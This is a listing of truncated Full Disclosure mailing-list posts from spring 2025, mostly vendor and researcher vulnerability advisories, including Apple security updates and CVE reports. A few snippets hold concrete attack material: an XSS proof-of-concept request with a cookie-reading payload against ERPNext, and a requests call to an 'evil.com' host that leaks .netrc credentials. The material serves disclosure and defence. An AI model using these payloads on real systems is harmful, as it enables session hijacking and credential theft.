Posted by josephgoyd via Fulldisclosure on Jun 09 Hello Full Disclosure, This is a strategic public disclosure of a zero-click iMessage exploit chain that was discovered live on iOS 18.2 and remained unpatched through iOS 18.4. It enabled Secure Enclave key theft, wormable remote code execution, and undetectable crypto wallet exfiltration. Despite responsible disclosure, … Read More “Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain → Secure Enclave Key Theft, Wormable RCE, Crypto Theft – Full Disclosure” »
Category: Alert Feeds
Posted by SEC Consult Vulnerability Lab via Fulldisclosure on Jun 09 SEC Consult Vulnerability Lab Security Advisory < 20250604-0 > ======================================================================= title: Local Privilege Escalation and Default Credentials product: INDAMED – MEDICAL OFFICE (Medical practice management) Demo version vulnerable version: Revision 18544 (II/2024) fixed version: Q2/2025 (Privilege Escalation, Default Password)… Read More “SEC Consult SA-20250604-0 :: Local Privilege Escalation and Default Credentials in INDAMED – MEDICAL OFFICE (Medical practice management) Demo version – Full Disclosure” »
Posted by Sanjay Singh on Jun 03 Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project: ———————————————————————— CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0 ———————————————————————— Product: CloudClassroom PHP Project Vendor:… – Read More – Full Disclosure
Posted by Stefan Kanthak on Jun 03 Hi @ll, user group policies are stored in DACL-protected registry keys [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies] respectively [HKEY_CURRENT_USER\Software\Policies] and below, where only the SYSTEM account and members of the “Administrators” user group are granted write access. At logon the user’s registry hive “%USERPROFILE%\ntuser.dat” is loaded with exclusive (read, write and… Read More “Defense in depth — the Microsoft way (part 89): user group policies don’t deserve tamper protection – Full Disclosure” »
Posted by Ron E on Jun 03 An authenticated user can inject malicious JavaScript into the user_image field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient sanitization, allowing stored script execution in the context of other authenticated users. *Proof of Concept:* POST … Read More “ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path – Full Disclosure” »
Posted by Ron E on Jun 03 An authenticated attacker can inject JavaScript into the bio field of their user profile. When the profile is viewed by another user, the injected script executes. *Proof of Concept:* POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/2 Host: –host– profile_info=”bio”:””><img src=x onerror=alert(document.cookie)>” – Read More – Full Disclosure
Posted by Andrey Stoykov on Jun 03 # Exploit Title: IDOR “Change Password” Functionality – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ IDOR “Change Password” Functionality #1: Steps to Reproduce: 1. Login as user with low privilege and visit profile page … Read More “IDOR “Change Password” Functionality – adaptcmsv3.0.3 – Full Disclosure” »
Posted by Andrey Stoykov on Jun 03 # Exploit Title: Stored XSS via File Upload – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS via File Upload #1: Steps to Reproduce: 1. Login with low privilege user and visit “Profile” … Read More “Stored XSS via File Upload – adaptcmsv3.0.3 – Full Disclosure” »
Posted by Qualys Security Advisory via Fulldisclosure on Jun 03 Qualys Security Advisory Local information disclosure in apport and systemd-coredump (CVE-2025-5054 and CVE-2025-4598) ======================================================================== Contents ======================================================================== Summary Mitigation Local information disclosure in apport (CVE-2025-5054) – Background – Analysis – Proof of concept Local information disclosure in systemd-coredump… – Read More – Full Disclosure
Posted by Jacek Lipkowski via Fulldisclosure on Jun 03 Hi, I made a novel honeypot for worms called Youpot. Normally a honeypot will try to implement whatever service it thinks the attacker would like. For a high interaction or pure honeypot this is often impossible, because of the thousands of possibilities. Even a simple … Read More “Youpot honeypot – Full Disclosure” »
Posted by Housma mardini on Jun 03 Hi, I am submitting an exploit for *CVE-2019-9978*, a remote code execution vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2). *Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2) *Date*: 2025-05-20 *Exploit Author*: Huseyin Mardinli *Vendor Homepage*: https://warfareplugins.com/ *Software Link*: https://wordpress.org/plugins/social-warfare/ … Read More “Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2) – Full Disclosure” »
Posted by Juho Forsén via Fulldisclosure on Jun 03 The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get('http://example.com:@evil.com/') Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. … Read More “CVE-2024-47081: Netrc credential leak in PSF requests library – Full Disclosure” »
Posted by Michał Majchrowicz via Fulldisclosure on Jun 03 Security Advisory Vulnerabilities reported to vendor: March 13, 2025 Vendor requested additional information: March 20, 2025 Additional information provided to vendor: March 22, 2025 Vendor confirmed the reported issues but rejected them: March 31, 2025 Additional information provided to vendor: May 6, 2025 Vendor confirmed … Read More “Multiple Vulnerabilities in SAP GuiXT Scripting – Full Disclosure” »
Posted by Andrey Stoykov on Jun 03 # Exploit Title: Stored XSS in “Description” Functionality – cubecartv6.5.9 # Date: 05/2025 # Exploit Author: Andrey Stoykov # Version: 6.5.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS #1: Steps to Reproduce: 1. Visit “Account” > “Address Book” and choose “Edit” 2. In the … Read More “Stored XSS in “Description” Functionality – cubecartv6.5.9 – Full Disclosure” »
Posted by Andrey Stoykov on Jun 03 # Exploit Title: Authenticated File Upload to RCE – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Authenticated File Upload to RCE #1: Steps to Reproduce: 1. Login as admin user and visit “System” > … Read More “Authenticated File Upload to RCE – adaptcmsv3.0.3 – Full Disclosure” »
Posted by Andrey Stoykov on Jun 03 # Exploit Title: Stored XSS “Send Message” Functionality – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS “Send Message” Functionality #1: Steps to Reproduce: 1. Login as normal user and visit “Profile” > … Read More “Stored XSS “Send Message” Functionality – adaptcmsv3.0.3 – Full Disclosure” »
Posted by Ron E on May 27 An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause. Sample Structured Query Language Injection: … Read More “Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework – Full Disclosure” »
Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 27 SEC Consult Vulnerability Lab Security Advisory < 20250521-0 > ======================================================================= title: Multiple Vulnerabilities product: eCharge Hardy Barth cPH2 and cPP2 charging stations vulnerable version: 2.2.0 fixed version: Not available CVE number: CVE-2025-27803, CVE-2025-27804, CVE-2025-48413, CVE-2025-48414, CVE-2025-48415,… – Read More – Full Disclosure
Posted by Shaikh Shahnawaz on May 16 [+] Credits: Shahnawaz Shaikh, Security Researcher at Cybergate Defense LLC [+] twitter.com/_striv3r_ [Vendor of Product] RSI Queue (https://www.rsiqueue.com/) [Vulnerability Type] Blind SQL Injection [Affected Component] The vulnerable component is the TaskID parameter in the get request. [CVE Reference] CVE-2025-26086 [Security Issue] An unauthenticated blind SQL injection vulnerability … Read More “Unauthenticated Blind SQL Injection | RSI queue management system – V 3.0 | CVE-2025-26086 – Full Disclosure” »
Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 16 SEC Consult Vulnerability Lab Security Advisory < 20250422-0 > ======================================================================= title: Local Privilege Escalation via DLL Search Order Hijacking product: Ivanti Endpoint Manager Security Scan (Vulscan) Self Update vulnerable version: EPM 2022 SU6 and previous, EPM 2024 fixed version: EPM 2022 SU7 and … Read More “SEC Consult SA-20250422-0:: Local Privilege Escalation via DLL Search Order Hijacking – Full Disclosure” »
Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 16 SEC Consult Vulnerability Lab Security Advisory < publishing date 20250429-0 > Combined Security Advisory for Sure Access Enterprise and Sure Click Enterprise ======================================================================= title: Multiple Vulnerabilities product: HP Wolf Security Controller / HP Sure Access Enterprise / HP Sure Click Enterprise vulnerable version: … Read More “SEC Consult SA-20250429-0 :: Multiple Vulnerabilities in HP Wolf Security Controller and more – Full Disclosure” »
Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 16 SEC Consult Vulnerability Lab Security Advisory < 20250507-0 > ======================================================================= title: Authenticated Command Injection product: Honeywell MB-Secure vulnerable version: MB-Secure versions from V11.04 and prior to V12.53, MB-Secure PRO versions from V01.06 and prior to V03.09 fixed version: MB-Secure v12.53, MB-Secure PRO v03.09 … Read More “SEC Consult SA-20250506-0 :: Honeywell MB Secure Authenticated Command Injection – Full Disclosure” »
Posted by Sebastian Auwärter via Fulldisclosure on May 16 Advisory ID: SYSS-2025-006 Product: Tiiwee X1 Alarm System Manufacturer: Tiiwee B.V. Affected Version(s): TWX1HAKV2 Tested Version(s): TWX1HAKV2 Vulnerability Type: Authentication Bypass by Capture-replay (CWE-294) Risk Level: CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N Solution Status: Open Manufacturer Notification: 2025-01-27… – Read More – Full Disclosure
Posted by Ron E on May 16 A persistent cross-site scripting (XSS) vulnerability exists in gugoan’s Economizzer v.0.9-beta1. The application fails to properly sanitize user-supplied input when creating a new category via the *category/create* endpoint. An attacker can inject malicious JavaScript payloads that are permanently stored and later executed in the context of any … Read More “Persistent Cross-Site Scripting in Economizzer Category Entry – Full Disclosure” »
Posted by Ron E on May 16 A session management vulnerability exists in gugoan’s Economizzer v.0.9-beta1. The application fails to properly invalidate user sessions upon logout or other session termination events. As a result, a valid session remains active and usable even after the user has attempted to log out. POST /web/category/create HTTP/2 Host: … Read More “Session Invalidation in Economizzer Allows Unauthorized Access After Logout – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-8 visionOS 2.5 visionOS 2.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122721. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. AppleJPEG Available for: Apple Vision Pro Impact: Processing a … Read More “APPLE-SA-05-12-2025-8 visionOS 2.5 – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-9 Safari 18.5 Safari 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122719. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. WebKit Available for: macOS Ventura and macOS Sonoma Impact: … Read More “APPLE-SA-05-12-2025-9 Safari 18.5 – Full Disclosure” »
Posted by Ron E on May 16 A persistent cross-site scripting (XSS) vulnerability exists in gugoan’s Economizzer v.0.9-beta1. The application fails to properly sanitize user-supplied input when creating a new cash book entry via the *cashbook/create* endpoint. An attacker can inject malicious JavaScript payloads that are permanently stored and later executed in the context … Read More “Persistent Cross-Site Scripting in Economizzer Cashbook Entry – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-5 macOS Ventura 13.7.6 macOS Ventura 13.7.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/122718. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. afpfs Available for: macOS Ventura Impact: Mounting … Read More “APPLE-SA-05-12-2025-5 macOS Ventura 13.7.6 – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-6 watchOS 11.5 watchOS 11.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122722. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. AppleJPEG Available for: Apple Watch Series 6 and later … Read More “APPLE-SA-05-12-2025-6 watchOS 11.5 – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-7 tvOS 18.5 tvOS 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122720. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. AppleJPEG Available for: Apple TV HD and Apple TV … Read More “APPLE-SA-05-12-2025-7 tvOS 18.5 – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-2 iPadOS 17.7.7 iPadOS 17.7.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/122405. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. AirDrop Available for: iPad Pro 12.9-inch 2nd generation, iPad … Read More “APPLE-SA-05-12-2025-2 iPadOS 17.7.7 – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-3 macOS Sequoia 15.5 macOS Sequoia 15.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122716. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. afpfs Available for: macOS Sequoia Impact: Connecting … Read More “APPLE-SA-05-12-2025-3 macOS Sequoia 15.5 – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-4 macOS Sonoma 14.7.6 macOS Sonoma 14.7.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/122717. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. afpfs Available for: macOS Sonoma Impact: Connecting … Read More “APPLE-SA-05-12-2025-4 macOS Sonoma 14.7.6 – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on May 16 APPLE-SA-05-12-2025-1 iOS 18.5 and iPadOS 18.5 iOS 18.5 and iPadOS 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122404. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. AppleJPEG Available for: … Read More “APPLE-SA-05-12-2025-1 iOS 18.5 and iPadOS 18.5 – Full Disclosure” »
Posted by CVE – VULSec Labs via Fulldisclosure on May 16 === SUMMARY === Vendor: ArcGIS Product: ArcGIS Subject: ArcGIS Hidden Functionality Allows Insecure OAuth 2.0 Based Authentication – CVE-2025-0020 VSL-2025-21 CVSS: 7.9 (high) CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/U:Amber Credit: Erez Kalman Author: VULSec Labs Date: 2025-05-14 === DETAILS === CWE/CAPEC: Violation of Secure Design Principles, Hidden Functionality, Incorrect Provision … Read More “ArcGIS Hidden Functionality Allows Insecure OAuth 2.0 Based Authentication – CVE-2025-0020 VSL-2025-21 – Full Disclosure” »
Posted by Flo Schäfer via Fulldisclosure on May 16 secuvera-SA-2025-01: Privilege Escalation Affected Products Automic Automation Agent Unix <24.3.0 HF4, <21.0.13 HF1 References secuvera-SA-2025-01 CVE not assigned yet CWE-426: Untrusted Search Path CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L Summary: An agent configured to run in privileged mode using the SetUID-Bit can be used to escalate privileges, by supplying an … Read More “secuvera-SA-2025-01: Privilege Escalation in Automic Automation Agent Unix – Full Disclosure” »
Posted by Egidio Romano on May 16 ————————————————————————— Invision Community <= 5.0.6 (customCss) Remote Code Execution Vulnerability ————————————————————————— [-] Software Link: https://invisioncommunity.com [-] Affected Versions: All versions from 5.0.0 to 5.0.6. [-] Vulnerability Description: The vulnerability is located in the… – Read More – Full Disclosure
Posted by Paul Szabo via Fulldisclosure on May 06 === Details ======================================================== Vendor: BeyondTrust Product: Privileged Remote Access (PRA) Subject: PRA connection takeover CVE ID: CVE-2025-0217 CVSS: 7.8 (high) CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Author: Paul Szabo <psz () maths usyd edu au> Date: 2025-05-05 === Introduction =================================================== I noticed an issue in BeyondTrust Privileged… Read More “BeyondTrust PRA connection takeover – CVE-2025-0217 – Full Disclosure” »
Posted by hyp3rlinx on May 01 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt [+] x.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] .xrm-ms File Type [Vulnerability Type] NTLM Hash Disclosure (Spoofing) [Video URL PoC] https://www.youtube.com/watch?v=d5U_krLQbNY [CVE Reference] N/A [Security Issue] The… – Read More – Full Disclosure
Posted by hyp3rlinx on Apr 26 [-] Microsoft “.library-ms” File / NTLM Information Disclosure Spoofing (Resurrected 2025) / CVE-2025-24054 [+] John Page (aka hyp3rlinx) [+] x.com/hyp3rlinx [+] ISR: ApparitionSec Back in 2018, I reported a “.library-ms” File NTLM information disclosure vulnerability to MSRC and was told “it was not severe enough”, that being said … Read More “Microsoft “.library-ms” File / NTLM Information Disclosure (Resurrected 2025) – Full Disclosure” »
Posted by Daniel Owens via Fulldisclosure on Apr 26 Good morning. All current versions and all versions since the 2022/2023 “fix” to the Rails cross-site request forgery (CSRF) protections continue to be vulnerable to the same attacks as the 2022 implementation. Currently, Rails generates “authenticity tokens” and “csrf tokens” using a random “one time … Read More “Ruby on Rails Cross-Site Request Forgery – Full Disclosure” »
Posted by Daniel Owens via Fulldisclosure on Apr 26 Inedo ProGet 2024.22 and below are vulnerable to unauthenticated denial of service and information disclosure attacks (among other things) because the information system directly exposes the C# reflection used during the request-action mapping process and fails to properly protect certain pathways. These are amplified by … Read More “Inedo ProGet Insecure Reflection and CSRF Vulnerabilities – Full Disclosure” »
Posted by Artur Janicki via Fulldisclosure on Apr 26 [APOLOGIES FOR CROSS-POSTING] CALL FOR PAPERS 14th International Workshop on Cyber Crime (IWCC 2025 – https://2025.ares-conference.eu/program/iwcc/) to be held in conjunction with the 20th International Conference on Availability, Reliability and Security (ARES 2025 – http://2025.ares-conference.eu) August 11-14, 2025, Ghent, Belgium IMPORTANT DATES Submission Deadline May … Read More “[IWCC 2025] CfP: 14th International Workshop on Cyber Crime – Ghent, Belgium, Aug 11-14, 2025 – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on Apr 23 APPLE-SA-04-16-2025-4 visionOS 2.4.1 visionOS 2.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122402. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. CoreAudio Available for: Apple Vision Pro Impact: Processing an … Read More “APPLE-SA-04-16-2025-4 visionOS 2.4.1 – Full Disclosure” »
Posted by Marco Ivaldi on Apr 23 Hi, Please find attached a security advisory that describes some vulnerabilities we discovered in the Zyxel uOS Linux-based operating system. * Title: Local privilege escalation via Zyxel fermion-wrapper * Product: USG FLEX H Series * OS: Zyxel uOS V1.31 (and potentially earlier versions) * Author: Marco Ivaldi … Read More “HNS-2025-10 – HN Security Advisory – Local privilege escalation in Zyxel uOS – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on Apr 23 APPLE-SA-04-16-2025-1 iOS 18.4.1 and iPadOS 18.4.1 iOS 18.4.1 and iPadOS 18.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122282. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. CoreAudio Available for: … Read More “APPLE-SA-04-16-2025-1 iOS 18.4.1 and iPadOS 18.4.1 – Full Disclosure” »
Posted by Apple Product Security via Fulldisclosure on Apr 23 APPLE-SA-04-16-2025-2 macOS Sequoia 15.4.1 macOS Sequoia 15.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122400. Apple maintains a Security Releases page at https://support.apple.com/100100 which lists recent software updates with security advisories. CoreAudio Available for: macOS Sequoia Impact: Processing … Read More “APPLE-SA-04-16-2025-2 macOS Sequoia 15.4.1 – Full Disclosure” »